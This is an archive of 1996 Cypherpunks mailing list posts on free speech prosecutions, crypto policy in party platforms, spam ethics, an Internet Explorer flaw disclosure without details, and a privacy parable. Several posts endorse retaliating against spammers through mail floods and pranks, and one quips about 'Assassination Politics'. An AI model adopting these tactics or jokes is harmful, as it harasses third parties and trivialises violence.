>Chicago police.  Any possible federal charges for threatening a president
>in violation of 18 U.S.C. Section 871 await a determination of the
>seriousness of the statement, in context with the wife's conduct, by
>prosecutors.  I predict no action.

Well, I agree that saying "I hope you die" is a tad bit more serious than
"You suck, and those boys died."

If these additional words were spoken, why didn't the SS reveal them early
on? (Or, if they did, why did the news reports not mention them?)

Personally, I would never utter such words, even to Clinton. Or Dole.
Tacky, even if one dislikes the Prez.

But I agree that "no action" is pretty likely. "I hope you die" has been a
time-honored insult at least since I was a kindergartner, and presumably
for many decades prior to this. Hardly an active threat.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Thu, 22 Aug 1996 03:45:44 +0800
To: cypherpunks@toad.com
Subject: Anonymous password assignment failure (illegal password)
Message-ID: <9608211343.AA11951@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the assignment of a new password
However, the password x-control is not legal.
Passwords should only contain letters and numbers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 22 Aug 1996 07:58:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Noise] RE: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <9607218406.AA840671790@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



jim bell <jimbell@pacifier.com> wrote: 
>The Net public is getting less and less tolerant of obvious bias on the part 
>of those who report the news.  The Times has some potential >(undisplayed) bias
that we need to be on the lookout for, but the Post is >actively engaging in
bias in its news stories, NOW.

My God! Could Chomsky be right after all?

James

A favorite story on Bosnia was an interview I saw with Noam Chomsky and Canadian
Major General Lewis Mackenzie who had led the Canadian forces in Bosnia. The
interviewer asked Chomsky some question about the real goals of the West in this
crisis and he gave some biting response about them having no motivation to
resolve the conflict but simply appear to be acting while continuing to follow
various policies that were cynical, amoral and contradictory to their stated
public goals. Lewis Mackenzie is then asked to rebut this view but instead he
agrees with Chomsky's analysis and goes on to give specific examples that he
faced first hand.

More Canadiana: The man who recently snuck into the Canadian Prime Minister's
residence and tried to assassinate him was released from jail last week after
serving three months. Fortunately, he did not call him names.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 22 Aug 1996 08:18:51 +0800
To: cypherpunks@toad.com
Subject: Republican and Democratic party platforms on technology
Message-ID: <v01510108ae413710a5cd@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



============

Date: Wed, 21 Aug 1996 16:35:49 -0500
To: fight-censorship@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: Republican and Democratic party platforms on technology
Sender: owner-fight-censorship@vorlon.mit.edu

Attached is an excerpt from the GOP's 1996 platform, provided by a
Republican Senate staffer. All keystroking errors mine -- this plank
doesn't seem to have been nailed into the rnc.org web site yet.

While the Republicans certainly are no fast friends of online liberties --
recall Dole cosponsored an "anti-cyberporn" bill worse than the CDA --
they've been moving in the right direction on crypto. This plank shows that
as a party, they're starting to take online privacy seriously.

Let's see what the Democrats do at their convention. I've attached relevant
excerpts from the platform committee's report, but the only coherent theme
I found is increased government spending.

(Contrast both parties with the Libertarians, which have a sterling
commitment to online civil liberties, reflected in the platform approved at
their convention last month.)

-Declan

---

[The rest of the platform is at http://www.rnc.org/hq/platform96/]

                     The 1996 Republican Party Platform

     Excerpt: Science, Technology, and Innovation in the 21st Century

Our goal is to empower the American people by using the benefits of
advanced science to improve their quality of life without undue restraint
from government. Our bottom line is more jobs, better jobs, and a higher
standard of living for the families of America.

We believe the marketplace, not bureaucrats, can determine which
technologies best meet the needs of the public.

[...]

The communications revolution empowers individuals, enhances health care,
opens up opportunity for rural areas, and strengthens families and
institutions. A Dole-led Congress passed the Telecommunications Act of 1996
to promote the full and open competition and freedom of choice in the
telecommunications marketplace. In contrast, the Clinton-Gore
Administration repeatedly defended big-government regulation. This
micromanagement of the Information Age is contrary to America's Information
Super Highway.

We support the broadest access to telecommunications networks and services,
based upon marketplace capabilties. ***The Internet today is the most
staggering example of how the Information Age can and will enhance the
lives of Americans everywhere. To further this explosion of new-found
freedoms and opportunities, privacy, through secured communications, has
never been more important. Bob Dole and the Republican Party will promote
policies that ensure that the U.S. remains the world leader in science,
technology, and innovation.***

[Emphasis mine. --Declan]

---

http://www.democrats.org/party/convention/pltdft96-2.html

               The Report of the Platform Committee to the 1996
                        Democratic National Convention

                   Today's Democratic Party: Meeting
                    America's Challenges, Protecting
                              America's Values

                   THE 1996 DEMOCRATIC NATIONAL PLATFORM

[...]

Technology. We know investments in technology drive economic growth,
generate new knowledge, create new high-wage jobs, build new
industries, and improve our quality of life. In the face of Republican
efforts to undermine America's dedication to innovation, President
Clinton and the Democratic Party have fought to maintain vital
investments in science and technology. We remember that government
investment in technology is responsible for the computer, for jet
aircraft, and for the Internet -- no investments have ever paid off
better, in jobs, in opportunity, or in growth.

[...]

Technology in the classroom. We must bring the 21st century into every
classroom in America. There is a vast realm of knowledge waiting for
our children to tap into. Computers are powerful tools to teach
students to read better, write better, and understand math. President
Clinton and Vice President Gore understand that technological literacy
is essential to success in the new economy. The only way to achieve
that for every student is to give them all access to a computer, good
software, trained teachers, and the Internet -- and President Clinton
and Vice President Gore have launched a partnership with high-tech
companies, schools, state, and local governments to wire every
classroom and library to the Information Superhighway by the year 2000.

[...]

The Clinton Administration is working to put wanted lists of parents
who owe child support in the post office and on the Internet. President
Clinton and Democrats in Congress insisted that the toughest possible
child support enforcement be part of the new welfare reform plan --
including the President's plan to deny drivers licenses and
professional licenses to people who do not pay their child support.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 11:12:15 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <ae40f1eb110210043298@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 PM 8/21/96, Asgaard wrote:
>On Tue, 20 Aug 1996, Timothy C. May wrote:
>
>> There are technological fixes which I would favor over attempts to ban
>> unwanted messages.
>
>In the meantime, before these technological fixes are easily implemented,
>what is the proper way to handle unwanted commercial mail?
>
>1) delete immediately
>
>2) reply with 'Fuck off, morons!'
>
>3) as in 2) plus an attachment of some 1Mb file
>
>4) as in 3) plus a CC to the postmaster of the sending site

Well, this actually just happened to me. I got a long message from the
"Computer Currents" folks, for Yet Another Net Newsletter, "Inside
Currents," saying they had added my name to their list and that if I wished
to be removed I should a) paste a certain reply form into a section at the
end of the message, b) readdress the reply to a person handling
unsubscribes, c) blah blah blah.

Instead, I just hit "Reply" and sent the message back to them.

I wasn't sure if the message would go out to the original list or not, nor
did I care. I didn't ask to be subscribed to their list, I wasn't
interested in learning their indiosyncratic procedure for removing one's
name, and they should have set up their distribution list so as not to
allow recipients to post to the entire list (it is, after all, not a
mailing list intended for postings by recipients).

Well, my message and dozens of similar reply messages from others went out
to the "Inside Currents" list, provoking an avalanche of even more replies,
bounces, etc.

"Computer Currents" is now feeling intense heat over this episode.

(My latest message, sent two days ago, was entitled "Fuck "Computer
Currents,"" and included my "How to Make a Pipe Bomb" sig. It hasn't come
back to me, so maybe CC figured out how to turn off their spammish
features.)

(Hey, "spammish" is a nice word. Hackers can say, "Yeah, I took Spammish in
high school.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris230@juno.com (Chris J Samuelson)
Date: Thu, 22 Aug 1996 09:48:06 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
In-Reply-To: <2.2.32.19960821145232.006fe294@tansoft.com>
Message-ID: <19960821.170816.6486.1.chris230@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Aug 1996 10:52:32 -0400 "James C. Sewell" <jims@MPGN.COM>
writes:
>At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
>>On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
>>
>>> I don't know if there has been much discussion on the ethics of 
>spamming
>>> here? Is spamming free speech? 
>>
>>Yes.
>
>No.  I think we can all (most) agree that spam-email is like 
>junk-snailmail.
>In that case there are a few things to consider:
>
>  1. Junkmail requires the SENDER to pay for it, not the recipient.
>  2. Junkmail is under the full authority of the Postmaster.  If
>     they do anything illegal they have an authority to which they
>     must answer and may face criminal charges for.
>  3. You can't legally stuff mailboxes by driving around the 
>neighborhood.
>     It is against the law for me to walk up to your mailbox and put 
>     something in it.  Should the same be true of emailboxes?
>  4. Junkmail is usually at a lower priority than "real" mail and 
>     due to costs is usually easily identifiable.  Email isn't.
>
>  And one relating to only email:
>
>     I don't want to have to spend 10 minutes letting Eudora sort
>     through my mailbox because my filter rules are so numerous and
>     complex due to me trying to block spam.
>
>  We must remember that the First Amendment does not allow us to say
>any thing at any time via any medium we choose.  There are limits
>to it, usually in the name of public safety and harassment.  There
>should be similar limits in the Internet.
>  I'm not saying we shouldn't let you tell others how get rich quick
>but that you should not be allowed to mail to *@*.* just to tell the
>world how great we are.
>
> Jim
>
>Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL
>
>
Why should the spammers pay for it, any more than anyone else should. 
They are still 
in some way paying for the E-Mail I assume, by keeping up a server or
paying someone else for the convienince of E-Mail.  If they tried to
force spammers to pay money they would have to have a way to decide if
someone was spamming.A good excuse to read E-Mail?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 10:58:06 +0800
To: Censored Girls Anonymous <cypherpunks@toad.com
Subject: Re: Ruritania
Message-ID: <ae40f4f812021004ea2f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 PM 8/21/96, Censored Girls Anonymous wrote:
>                      The Legend of Ruritania
>
>There was once a far away land called Ruritania, and in this land there was
>a strange phenomenon  --  all the trees that grew there were transparent.
>In the old days, the people had lived in mud huts.   But now, high-tech wood
.......
>to stop the recent wave of people thinking obscene thoughts about tomatoes,
>which Dorothy Quisling noted was one of the major problems of the new age
>of plenty and joy.
>Member Internet Society  - Certified BETSI Programmer  -  Webmistress
>***********************************************************************
>Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96


Carol,

I see no attribution for this. Did you write it?

It looks very familiar, like something that was posted to the Cypherpunks
list a couple of years ago. (I seem to recall Perry Metzger writing a
similar, or even identical, piece.)

If you wrote it, great. But if someone else wrote it, you should definitely
mention this, and give a name if you have it. If you know someone besides
yourself wrote it, but the name was unattached to the copy you got, this
should also be mentioned.

Again, if you wrote it, great. And I apologize for even hinting that you
did not. But it sure looks familiar.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 10:54:19 +0800
To: cypherpunks@toad.com
Subject: Re: Canada Imprisons People For Human Rights Activity
Message-ID: <ae40f6b0130210045167@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:33 PM 8/21/96, Igor Chudov @ home wrote:
>jbugden@smtplink.alis.ca wrote:
>> Nota: Quebec recently held a referendum on seperation from Canada.=20
>> Just talk about secession of a state in the U.S., and you'll quickly see wh=
>> ich
>> country makes political ideas illegal.
>>
>
>OK, so what would happen if I organized a party with the proclaimed goal
>of secession of Oklahoma from the United States?
>
>        - Igor.

Almost certainly nothing. I believe there is an active secessionist
movement in Alaska, and nothing has happened to them.

(This does not mean they would ever be allowed to succeed in seceeding, of
course.)

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 22 Aug 1996 11:35:05 +0800
To: cypherpunks@toad.com
Subject: RISKS: Microsoft Explorer security hole
Message-ID: <v01540b00ae41586b4b42@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------

Date: Wed, 21 Aug 1996 13:12:59 -0400
From: felten@CS.Princeton.EDU (Ed Felten)
Subject: Internet Explorer Security Problem

We have discovered a security flaw in the current version (3.0) of
Microsoft's Internet Explorer browser running under Windows 95.  An attacker
could exploit the flaw to run any DOS command on the machine of an Explorer
user who visits the attacker's page.  For example, the attacker could read,
modify, or delete the victim's files, or insert a virus or backdoor entrance
into the victim's machine.  We have verified our discovery by creating a Web
page that deletes a file on the machine of any Explorer user who visits the
page.

The core of the attack is a technique for delivering a document to the
victim's browser while bypassing the security checks that would normally be
applied to the document.  If the document is, for example, a Microsoft Word
template, it could contain a macro that executes any DOS command.

Normally, before Explorer downloads a dangerous file like a Word document,
it displays a dialog box warning that the file might contain a virus or
other dangerous content, and asking the user whether to abort the download
or to proceed with the download anyway.  This gives the user a chance to
avoid the risk of a malicious document.  However, our technique allows an
attacker to deliver a document without triggering the dialog box.

Microsoft has been notified and they are working on fixing the problem.
Until a remedy is widely available, we will not disclose further details
about the flaw.

For more information, contact Ed Felten at felten@cs.princeton.edu or
609-258-5906.

Dirk Balfanz and Ed Felten
Dept. of Computer Science, Princeton University
http://www.cs.princeton.edu/sip/

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 11:23:30 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <ae40f7c1140210049197@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:04 PM 8/21/96, Gary Howland wrote:

>I always send a quick one liner - "Please send me more information".
>Often I'll ask a stupid question too ("Does your software work in
>France?").  If more people did this, then they'd have to choose their
>victims a bit more carefully in the future (assuming of course they're
>trying to sell something).

As I said in my last message, I don't even do this--I just bounce it back
to them.

I see no need to "ask questions" (such as "Does it work in France?") to,
perhaps, "establish legitimacy." If they sent it to me, I can send it back.
Simple.

And if their software is set up in a brain-damaged way, so that my bouncing
it back to them also sends it out to their list, so much the better...at
least in terms of helping to anger their potential customers.

--Tim May

(By the way, some of you younger folks may not remember all the creative
ways people used to have to deal with unwanted junk mail. For "return
postage provided" replies, they would often attach the return forms to
large packages of stuff (sometimes even organic, stinky stuff) and let the
junk mailer eat the postage charges at his end. Or they'd fill out the "get
free stuff" forms with the addresses of local officials.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 09:05:15 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <199608210005.KAA12548@suburbia.net>
Message-ID: <Pine.SV4.3.91.960821172902.10434A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Julian Assange wrote:

> Darwinism is working as well as it ever was. You may not like it, but
> shit is being selected for.

    Well that sounds.... internally consistent. Oh my God. I'm a dinosaur.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 08:51:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <ae3fa332050210048d05@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960821173156.10434B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


"insulting the Monarch"


It's called lese Majeste, knave.

It's still a VERY serious offense in Thailand.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 11:42:59 +0800
To: cypherpunks@toad.com
Subject: Re: Republican and Democratic party platforms on technology
Message-ID: <ae40fb6d160210046e90@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:59 PM 8/21/96, Declan McCullagh wrote:

>While the Republicans certainly are no fast friends of online liberties --
>recall Dole cosponsored an "anti-cyberporn" bill worse than the CDA --
>they've been moving in the right direction on crypto. This plank shows that
>as a party, they're starting to take online privacy seriously.

I think we all know just how long such a taking online privacy seriously
committment would last...about two or three briefings from the FBI, CIA,
NSA, and DIA. Maybe Dole would get the infamous "If you only knew what we
know" briefing, maybe he already has had it (and is just cynically
supporting "online privacy" because it's a way to contrast himself with
Clinton).

Sure, the rhetoric might be slightly different under a Dole presidency. The
focus would be on "halting the spread of abortion information on the Net"
and "plotting by Communists using unbreakable cryptography."

>(Contrast both parties with the Libertarians, which have a sterling
>commitment to online civil liberties, reflected in the platform approved at
>their convention last month.)

I certainly plan to vote for Harry Browne, their candidate, even if voting
only encourages the process.

I first read Browne's stuff back in 1973, and, a few years later, his
wonderful and "Zen Calvinist" (my term) book, "How I Found Freedom in an
Unfree World," which I still recommend to people. As far as I'm concerned,
Browne is the strongest candidate ever fielded by the Libertarian Party.

Not that it will matter. Ralph Nader will probably get more votes than Browne.

The answer lies in technology, not the ballot box.

--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Thu, 22 Aug 1996 11:37:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <m0utNUA-000rcmC@maki.wwa.com>
Message-ID: <Pine.SUN.3.94.960821174005.27985A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, jim bell wrote:

> Frankly, I'd rather have a president who didn't feel the need to be 
> protected by thugs.

Makes it easier to implement 'Assassination Politics' if you have to. 
:)

William Knowles
erehwon@c2.net


--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 08:58:03 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISE] Airport legal question
In-Reply-To: <Pine.3.89.9608201919.A23972-0100000@netcom14>
Message-ID: <Pine.SV4.3.91.960821175047.10434G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> the X-ray machine. Would an "I love Explosives" sticker on carry-on 
> luggage violate any laws?


No. You'd be released. Eventually. After your flight had departed, perhaps?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Thu, 22 Aug 1996 09:03:04 +0800
To: cypherpunks@toad.com
Subject: Lesson 2 in cracking (cryptoanalysis 001)
Message-ID: <960821175542_184580468@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-08-21 03:14:57 EDT, you write:

> Okay wise guy.  I'm going to give you a 14300 character string that
>  starts out

Big deal.

>How are you going to tell *what* I was talking about?  I guarantee with
>any message of practical length (i.e. not " ckosuuy") will have multiple
>possibilities, particularly when you take things like mispellings,

Mispelling are an acknowledge means of screwing up the algorithms I gave you.
 However, they are usually close to the original spelling.  In addition, once
most of the cipher has been dealt with, these fall into place quite nicely
anyhow.

>software artifacts ("----- BEGIN PGP --------" "X-Received ..." etc.) and

So tell me what the difference is between a bunch of messages with th, st, ya
da ya da and messages with instances of say 27 27 27 27 27 obviously the
dashes from your pgp insert.  If anything, you've added more ammunition
against your self.  Think expanded pattern matching if you can something like
pa*tern...

>deliberate attempts to throw you off.  That's why it's unbreakable - by
>anyone!

Including the user, after all, you show a transformation by setting all
vowels to the front, then a transformation into numbers, a shuffle by number
order, then a transformation back into letters.

During decryption:

How do you place the vowels into the correct position?

How do you place the numbers into the previous order before ascending sort
them?

You are a , lets see a good name I was once placed with,  a TROLL.

The first pot was not to insult you more so than to inform others of attacks.

This post can be considered a personal attack, you TROLL.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 09:25:05 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: US Taxes on X-Pats (getting off topic)
In-Reply-To: <Pine.LNX.3.93.960820221430.391B-100000@smoke.suba.com>
Message-ID: <Pine.SV4.3.91.960821175502.10434I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> > "we killed the natives so this land is our land and the rest of you f@*k-off"


The current group of "Native Americans" were not the first on the land.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Aug 1996 08:50:28 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <v0300780cae4008975ab2@[206.119.69.46]>
Message-ID: <Pine.SV4.3.91.960821180017.10434L-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


My first real job was as a clerk in the New York Merchantile Exchange, 
back in the days when we stood on platforms, writing trade prices on the 
wallboards with chalk.

I should have stayed around, most white males who did eventually moved up 
to being a floor trader.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <lucifer@dhp.com>
Date: Thu, 22 Aug 1996 09:28:05 +0800
To: cypherpunks@toad.com
Subject: Security Dynamics <-> Microsoft
Message-ID: <199608212202.SAA17249@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.briefing.com/storystk.htm

15:20 ET ******

SECURITY DYNAMICS TECHNOLOGIES (SDTI) 60 +4 1/4. Maker of security products
used to protect and manage access to computer-based information is seeing its
stock get a lift from news that company's RSA unit has reached licensing
agreement with Microsoft (MSFT 122 1/4 -1 1/8). In return for technical
cooperation and additional licensing rights for integration of RSA's
technology with Microsoft's cryptoapi, Microsoft will license cryptoapi to
RSA, including rights to incorporate cryptoapi into RSA's toolkit products.
According to company, RSA will receive an ongoing stream of revenue from
MSFT based on the use of patented RSA technology. Also, company will license
software to MSFT that will enable it to include support for SDTI's hardware
tokens and ace/server authentication products in future versions of Windows
NT and MSFT Internet Information Server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 22 Aug 1996 12:09:35 +0800
To: cypherpunks@toad.com
Subject: Re: 20 year key ?
In-Reply-To: <199608212246.PAA09169@jobe.shell.portal.com>
Message-ID: <199608220103.SAA09750@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Anonymous writes:

> Is there such a thing as a "20 YEAR KEY "  would it be a 2048 bit 
> or larger or what ?

No.  Because of the nature of mathematical progress, no reputable
cryptographer will make predictions beyond 3-5 years. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Thu, 22 Aug 1996 13:07:34 +0800
To: mthompso@qualcomm.com (Michelle KC5KYO)
Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
In-Reply-To: <Pine.GSO.3.94.960821145137.18639C-100000@strange.qualcomm.com>
Message-ID: <199608220131.SAA19868@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! > I do not believe that freedom of speech in the U.S.A. extends to actively
! > agitating for secession or the overthrow of the federal government.
! 
! The right to discuss revolt or secession or the overthrow of the federal
! government, it seems to me, is given below:
! 
! "We hold these Truths to be self-evident, that all Men are created
! equal, that they are endowed by their Creator with certain unalienable
! Rights, that among these are Life, Liberty, and the Pursuit of 
! Happiness - That to secure these Rights, Governments are instituted
! among Men, deriving their just Powers from the Consent of the
! Governed, that whenever any Form of Government becomes destructive of
! these Ends, it is the Right of the People to alter or to abolish it,
! and to institute new Government, laying its Foundation on such
! Principles, and organizing its Powers in such Form, as to them shall
! seem most likely to effect their Safety and Happiness.  ... "
! 
! Now this is the Declaration of Independence, and not the Constitution, but
! it seems to me that the right to discuss "agitating for secession or the
! overthrow of the federal government" is protected.

Correct, if government is not protecting our rights as a people, we are 
responsible for forcing the government to do so, even if that means 
changing of the guard, ie, successful radicalism.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 22 Aug 1996 12:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: Ruritania
In-Reply-To: <ae40f4f812021004ea2f@[205.199.118.202]>
Message-ID: <199608220140.SAA23628@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@got.net (Timothy C. May) writes:
>At 7:18 PM 8/21/96, Censored Girls Anonymous wrote:
>>                      The Legend of Ruritania
>>
>>There was once a far away land called Ruritania, and in this land there was
>>a strange phenomenon  --  all the trees that grew there were transparent.
>>In the old days, the people had lived in mud huts.   But now, high-tech wood
>.......
>>to stop the recent wave of people thinking obscene thoughts about tomatoes,
>>which Dorothy Quisling noted was one of the major problems of the new age
>>of plenty and joy.
>>Member Internet Society  - Certified BETSI Programmer  -  Webmistress
>>***********************************************************************
>>Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96


>Carol,

>I see no attribution for this. Did you write it?

>It looks very familiar, like something that was posted to the Cypherpunks
>list a couple of years ago. (I seem to recall Perry Metzger writing a
>similar, or even identical, piece.)

Good eye, Tim -- here's Perry's piece, which I just happened to save.

	Jim Gillogly
	Hevensday, 30 Wedmath S.R. 1996, 01:37

--------------------------------------------------------------------------

To: cypherpunks@toad.com
Subject: The Parable of Ruritania
Date: Tue, 11 Oct 1994 14:21:40 -0400
From: "Perry E. Metzger" <perry@imsi.com>


Someone just wrote me to ask if they could put this (very old) posting
of mine up on their home page. The recent passage of Digital Telephony
makes me feel this is a good time to send it out again. I should
probably edit it and send it out to the net again -- among other
things, I should alter the Dorothy Quisling comments and clean up a
bunch of the paragraphs and expand it. However, I thought I'd send it
out again now anyway.

Perry

------- Forwarded Message

A Parable


by Perry E. Metzger (perry@gnu.ai.mit.edu)



There was once a far away land called Ruritania, and in Ruritania
there was a strange phenomenon -- all the trees that grew in
Ruritainia were transparent. Now, in the days when people had lived in
mud huts, this had not been a problem, but now high-tech wood
technology had been developed, and in the new age of wood, everyone in
Ruritania found that their homes were all 100% see through. Now, until
this point, no one ever thought of allowing the police to spy on
someone's home, but the new technology made this tempting. This being
a civilized country, however, warrants were required to use binoculars
and watch someone in their home.  The police, taking advantage of
this, would get warrants to use binoculars and peer in to see what was
going on. Occasionally, they would use binoculars without a warrant,
but everyone pretended that this didn't happen.

One day, a smart man invented paint -- and if you painted your house,
suddenly the police couldn't watch all your actions at will. Things
would go back to the way they were in the old age -- completely
private.

Indignant, the state decided to try to require that all homes have
video cameras installed in every nook and cranny. "After all", they
said, "with this new development crime could run rampant. Installing
video cameras doesn't mean that the police get any new capability --
they are just keeping the old one."

A wise man pointed out that citizens were not obligated to make the
lives of the police easy, that the police had survived all through the
mud hut age without being able to watch the citizens at will, and that
Ruritania was a civilized country where not everything that was
expedient was permitted. For instance, in a neighboring country, it
